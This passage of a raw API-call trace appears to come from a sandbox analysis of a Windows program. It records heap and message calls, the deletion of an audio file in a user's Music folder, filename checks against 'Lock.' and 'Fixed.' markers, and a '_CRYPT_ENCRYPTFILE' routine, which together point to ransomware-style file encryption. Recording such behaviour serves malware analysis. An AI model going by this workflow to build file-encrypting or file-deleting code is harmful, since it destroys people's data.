dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.973] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.973] FreeLibrary (hLibModule=0x756e0000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0245.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.973] CloseHandle (hObject=0x2a0) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0245.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0245.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0245.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.977] CloseHandle (hObject=0x2d0) returned 1 [0246.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.021] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.021] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.021] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", lpFilePart=0x8cedf4*="n2lzfQolvCVgNf.m4a") returned 0x28 [0246.021] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a" (normalized: "c:\\users\\fd1hvy\\music\\n2lzfqolvcvgnf.m4a")) returned 0x20 [0246.021] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85340e0, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0x738e2d90, ftLastAccessTime.dwHighDateTime=0x1d5e92f, ftLastWriteTime.dwLowDateTime=0x738e2d90, ftLastWriteTime.dwHighDateTime=0x1d5e92f, nFileSizeHigh=0x0, nFileSizeLow=0x103c1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="n2lzfQolvCVgNf.m4a", cAlternateFileName="N2LZFQ~1.M4A")) returned 0xa87590 [0246.021] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a" (normalized: "c:\\users\\fd1hvy\\music\\n2lzfqolvcvgnf.m4a")) returned 1 [0246.065] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85340e0, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0x738e2d90, ftLastAccessTime.dwHighDateTime=0x1d5e92f, ftLastWriteTime.dwLowDateTime=0x738e2d90, ftLastWriteTime.dwHighDateTime=0x1d5e92f, nFileSizeHigh=0x0, nFileSizeLow=0x103c1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="n2lzfQolvCVgNf.m4a", cAlternateFileName="N2LZFQ~1.M4A")) returned 0 [0246.065] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0246.066] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0246.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0246.067] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", lpFilePart=0x8cf650*="n2lzfQolvCVgNf.m4a") returned 0x28 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0246.067] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a" (normalized: "c:\\users\\fd1hvy\\music\\n2lzfqolvcvgnf.m4a")) returned 0xffffffff [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0246.067] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0246.067] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.067] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0246.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="psWdx1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWdx1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wdx1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dx1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ftUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uz7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0246.068] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0246.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="psWdx1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWdx1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wdx1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dx1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ftUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uz7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.070] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0246.070] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0246.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0246.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0246.071] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0246.071] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0246.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.072] 